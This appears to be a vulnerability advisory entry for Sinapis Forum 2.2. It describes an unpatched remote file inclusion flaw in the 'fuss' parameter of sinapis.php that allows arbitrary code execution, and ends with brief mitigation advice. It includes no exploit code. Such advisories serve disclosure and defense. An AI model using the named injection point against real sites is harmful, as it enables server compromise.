vendor:
Sinapis Forum
by:
kezzap66345
8.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: Sinapis Forum
Affected Version From: Sinapis Forum 2.2
Affected Version To: Sinapis Forum 2.2
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Sinapis Forum 2.2 RFI Vulnerability
The Sinapis Forum 2.2 script is vulnerable to Remote File Inclusion (RFI) attack. An attacker can exploit this vulnerability by injecting a malicious file path in the 'fuss' parameter of the sinapis.php file, which can lead to arbitrary code execution on the server.
Mitigation:
The vendor should release a patch to fix the RFI vulnerability. In the meantime, users are advised to restrict access to the sinapis.php file and sanitize user input to prevent RFI attacks.